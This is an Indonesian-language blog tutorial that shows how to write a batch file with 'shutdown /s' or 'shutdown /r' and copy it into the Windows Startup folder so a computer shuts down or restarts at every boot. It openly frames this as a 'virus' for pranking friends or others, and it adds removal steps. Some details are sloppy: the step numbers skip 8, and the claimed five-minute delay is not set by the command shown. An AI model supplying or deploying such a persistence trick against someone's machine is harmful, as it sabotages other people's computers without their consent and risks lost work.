cara membuat virus shutdown atau restart terus menerus dengan notepad

Cara Membuat Virus Shutdown atau Restart Dengan Notepad – pasti ada banget nih yang mau tau cara buat virus ini buat jailin temen atau orang lain ataupun di net kwowkowk, jadi virusnya itu kalo kita mau masuk ke windows setelah 5 menit dia restart kwowkowk kasti kesel banget nih orang yang kecantol virus ini, tapi tentu saja virus ini ada pengkalnya atau lebih tepatnya cara mengatasinya setetlah kecantol virus ini.

cara membuat virus shutdown dengan notepad sangatlah mudah, mudah sekali sampe dua kali pun atau mudah tigakali wkowkwok kidding

ya virusnya sangat mudah hanya beberapa baris code atau script atau mungkin bukan script, yang memang sangat mudah

ok tutorial membuat virus shutdown dengan notepad :

1. pastikan osnya windows  untuk target peletakan virus
2. buka notepad
3. ketik : “cd c:/windows/system32” lalu enter
4. ketik : ” shutdown /s”
5. lalu simpan dengan format .bat , misalnya : “virus.bat” . tanpa petik
6. sudah jadi virus shutdownnya, jika kamu membuka file tersebut maka pc atau laptop nya akan shutdown

jika kamu mau virus melakukan shutdown saat komputer/pc hidup setiap kali maka kamu harus ikuti langkah berikut ini, lanjutannya:

7. copy file virus.bat yang baru kamu buat
9. klik start windows
10. klik all programs
11. cari dan klik kanan folder “startup”
12. klik open all users, nah kan keluar folder baru tuh di win explorernya
13. kopikan virus.bat kedalam folder startup itu klik kanan paste didalam folder
14. enjoy virus kwokwok ini mah bukan enjoy namanya
15. coba deh restart pc maka pc akan shutdown dalam waktu 5menit

jika kamu mau virus shutdown jadi virus restart kamu tinggal ganti di langkah ke 4 menjadi : “shutdown /r”

oke sampai situ cara membuat virus shutdown / restart terus menerus

untuk menghapus virusnya agar tidak terulang lagi virusnya kamu harus melawan atau berkelahi dengan waktu, yaitu waktunya terbatas

jadi cara ngatasinya :

 – buka start windows
– klik all programs
– cari dan klik 1x folder “startup”
– klik kanan file virus.bat yang kalian buat
– pilih delete
– nanti pc/laptop akan restart 1x dan pc/laptop akan normal kembali

ok mudah kan caranya?

 langsung coba ke pc kamu kwowkowk kalo kamu berani tapi ini bukan virus yang berbahaya kok kayak trojan atau malware lainnya apalah itu

selamat mencoba cara membuat virus shutdown atau restart terus menerus- semoga suskses 😀

Sekian artikel cara membuat virus shutdown atau restart ketika reboot atau terus menerus dengan notepad ! semoga bermanfaat !

Leave a Reply

Your email address will not be published. Required fields are marked *